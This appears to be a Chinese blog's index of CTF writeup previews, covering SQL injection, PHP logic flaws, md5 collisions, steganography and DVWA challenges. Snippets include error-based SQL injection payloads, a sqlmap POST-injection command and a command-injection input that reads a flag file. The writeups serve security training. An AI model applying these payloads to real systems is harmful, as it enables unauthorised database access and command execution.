CTFwrite
可乐'
入侵检测
安全运营
交流:sty1e_404
展开
-
CTF隐写(stegsolve)
首先想到的得是用stegsolve分析得到flag原创 2018-05-19 15:22:08 · 14144 阅读 · 0 评论 -
拐弯抹角
Flag:<?php // code by SEC@USTC echo '<html><head><meta http-equiv="charset" content="gbk"></head><body>'; $URL = $_SERVER['REQUEST_URI']; //echo 'URL:原创 2018-12-16 15:33:58 · 404 阅读 · 0 评论 -
神盾局的秘密
题目地址 :http://web.jarvisoj.com:32768/ 一般套路,先看HTTP头,源码 通过扫网站发现存在index.pnp访问也没有什么东西尝试:http://web.jarvisoj.com:32768/showimg.php?img=index.php 将index.php进行base64试试:view-source:htt...原创 2018-12-21 22:27:57 · 372 阅读 · 0 评论 -
CTF实验吧- 加了料的报错注入分值
用burpsuit对username进行fuzz一下,发现过滤了超多东西,被过滤就会显示 user name unknow error 或者Sql injection detected 或者Unknown password error.没有过滤只会显示 Login failed# limit strsub union () ,没有过滤extractvalue,up...原创 2018-12-11 11:45:49 · 459 阅读 · 1 评论 -
实验吧-程序逻辑问题
<?phpif (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) // 只能包含字母或者数字开头 { echo '<p>You password must be alphanumeric</p>'; } else ...原创 2018-12-18 12:54:34 · 348 阅读 · 0 评论 -
安恒杯12月月赛
WEB 这次的月赛可以说非常适合我这种菜鸡做了ezweb2:请求包中发现一个user=base64解码得到user,构造admin 然后base64提交发现跳转到后台admin.php试了一个ls发现有回显,应该是个命令执行漏洞构造: cmd = ls$IFS/ 成功回显然后读取flag: cmd = cat $IFS /ffLAG_404easy:<?php ...原创 2018-12-23 23:02:15 · 1509 阅读 · 0 评论 -
2018中原工学院网络安全校赛
Drops攻防训练营欢迎你的加入打开页面查看响应头有一个 tips:4he9e.txt 然后访问这个页面&lt;?php$flag = "***";if (isset($_GET['repo'])) { if (strcmp($_GET['repo'], $flag) == 0) die('Flag: '.$flag); else ...原创 2018-12-24 23:08:39 · 694 阅读 · 0 评论 -
Mysql字符编码利用技巧
造成这种漏洞的原因是Mysql字段的字符集和php mysqli客户端设置的字符集不相同。我们在进行编写php文件的时候&lt;?php$mysqli = new mysqli("localhost", "root", "root", "cat");/* check connection */if ($mysqli-&g原创 2019-01-12 14:23:04 · 292 阅读 · 0 评论 -
2018·i春秋圣诞欢乐赛官方WriteUp
gift打开页面考点: snow html隐写snow 是一款在html嵌入隐写信息的软件,它的原理是通过在文本文件的末尾嵌入空格和制表位的方式嵌入隐藏信息,不同空格与制表位的组合代表不同的嵌入信息。解密网址:http://fog.misty.com/perry/ccs/snow/snow/snow.html密钥为题目名字gift phpDo you know .swp f...原创 2019-01-09 19:21:23 · 2480 阅读 · 0 评论 -
2019安恒杯一月新春贺岁赛writeup
Simple phphttp://101.71.29.5:10004/robots.txthttp://101.71.29.5:10004/adminThinkPHP3.2.3http://101.71.29.5:10004/index.php?username[0]=bind&amp;amp;amp;amp;amp;amp;username[1]=0 and updatexml(1,concat(0x7,user(),0x7...原创 2019-01-27 14:55:54 · 4335 阅读 · 0 评论 -
简单的sql注入之3
exp报错'or exp(~(select * from (select database())x)) or' 'or exp(~(select * from (select group_concat(table_name)from information_schema.tables where table_schema=database())x))or' 'or exp(~(s...原创 2018-12-15 21:19:30 · 421 阅读 · 0 评论 -
实验吧-你真的会PHP吗?
<?php$info = ""; $req = [];$flag="xxxxxxxxxx";ini_set("display_error", false); error_reporting(0); if(!isset($_POST['number'])){ header("hint:6c525af4059b4fe7d8c33a.txt"); die("h...原创 2018-12-15 15:32:14 · 429 阅读 · 0 评论 -
实验吧CTF(认真一点!)
输入1输入2或者其他内容看来只有输入1猜显示you are in 输入其他都是you are not in 输入;过滤了:union空格逗号%and^sleepsubstr|#;发现or 没有过滤先看看可以用哪些来代替空格经过测试 /**/ 可以代替空格于是构造id=1'/**/or/**/1='1按理来...原创 2018-12-13 22:50:41 · 1862 阅读 · 0 评论 -
bugCTF(备份是个好习惯)
preg_match()是正则表达式/w 表示原创 2018-06-17 14:12:14 · 1860 阅读 · 0 评论 -
bugku-(你从哪里来 100)
修改http referer头即可HTTP_REFERER 编辑HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器基此可以获得一些信息用于处理。简而言之,HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服...原创 2018-08-05 15:57:51 · 5572 阅读 · 2 评论 -
bugku(md5 collision(NUPT_CTF))
md5碰撞漏洞描述<?php$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}";} else { echo...原创 2018-08-05 16:34:03 · 6359 阅读 · 1 评论 -
bugku(各种绕过 110)-CTF
老套路了原创 2018-08-05 16:52:33 · 1656 阅读 · 0 评论 -
sqlmap之POST注入
强烈介意用文件导入来进行注入用表单注入失败率很高!! 来看这题http://123.206.87.240:8002/chengjidan/index.php 明显是POST注入利用sqlmap吧,网上都是用手工注入,我就用sqlmap来试试先用Burp抓包保存为txt文件如何用sqlmapsqlmap.py -r "D:/test.txt" -p -id -...原创 2018-10-22 23:09:15 · 1224 阅读 · 0 评论 -
MD5之守株待兔-py3
import requestsimport timeurl ="http://ctf5.shiyanbar.com/misc/keys/keys.php"key_time =int(time.time())url ="http://ctf5.shiyanbar.com/misc/keys/keys.php?key="+str(key_time)while 1: res ...原创 2018-11-14 20:49:05 · 588 阅读 · 0 评论 -
DVWA(low)
Brute Force 第一个是暴力破解 首先看看源代码 <?phpif( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pa...原创 2018-11-24 18:49:42 · 754 阅读 · 0 评论 -
2018 南邮 NCTF writeup(部分)更新中---
2018 南邮 NCTF writeup周六的打南邮的比赛,做了一道签到题,接着是一道SQL注入,想了一上午,最终还是没有做出来,怪自己喜欢用sqlmap,加上自己做的sql注入题目少签到题点击链接直接跳转到百度了,用burpsoup重放一遍就OK了滴!晨跑打卡通过用burpsoup的sql fuzz测试了一下发现注释了 空格 # - *将注释全都过滤了,只能用单引号闭合绕过...原创 2018-11-27 23:26:05 · 2485 阅读 · 0 评论 -
2019杭电CTF HGAME Writeup
前言第一次AK了web…WEB谁吃了我的flag呜呜呜,Mki一起床发现写好的题目变成这样了,是因为昨天没有好好关机吗T_T hint: 据当事人回忆,那个夜晚他正在用vim编写题目页面,似乎没有保存就关机睡觉去了,现在就是后悔,十分的后悔。hint 是后来增加的 一开始做的时候就想到类vim文件泄露 可是当时没有第二天看了出了hint 说是vim 再进行 /.index.html...原创 2019-01-27 15:00:26 · 3057 阅读 · 0 评论